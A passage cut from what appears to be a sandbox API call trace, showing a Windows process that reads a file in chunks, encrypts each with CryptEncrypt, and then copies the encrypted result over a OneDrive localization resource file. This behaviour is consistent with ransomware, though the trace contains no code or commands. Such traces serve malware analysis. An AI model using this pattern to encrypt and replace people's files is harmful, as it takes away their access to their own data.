lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.313] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.313] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.313] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.313] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.313] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.313] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.313] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.313] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.313] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.313] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.313] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.313] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.313] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.314] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.314] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.314] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.314] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.314] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.314] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.314] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.314] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.314] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.314] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.314] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.314] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.314] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.314] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.315] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.315] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.315] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.315] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.315] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.315] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.315] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.315] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.315] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.315] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.315] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.315] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.315] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.315] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.315] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.315] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.316] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.316] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.316] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.316] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.316] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.316] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.316] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.316] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.316] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.316] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.316] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.316] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.316] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.316] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.316] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.316] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.317] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.317] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.317] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.317] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.317] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.317] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.317] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.317] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.317] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.317] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.317] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.317] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.318] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.318] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.318] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.318] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.318] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.318] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.318] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.318] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.318] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.318] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.318] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.318] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.318] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.318] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.318] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.319] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.319] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.319] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.319] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.319] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.319] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.319] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.319] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.319] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.319] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x2c0, lpOverlapped=0x0) returned 1 [0271.319] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2c0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2d0) returned 1 [0271.319] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0271.319] CloseHandle (hObject=0x5d4c) returned 1 [0271.319] CloseHandle (hObject=0x5d3c) returned 1 [0271.320] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\it\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\it\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0271.324] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\FileSync.LocalizedResources.dll.mui", 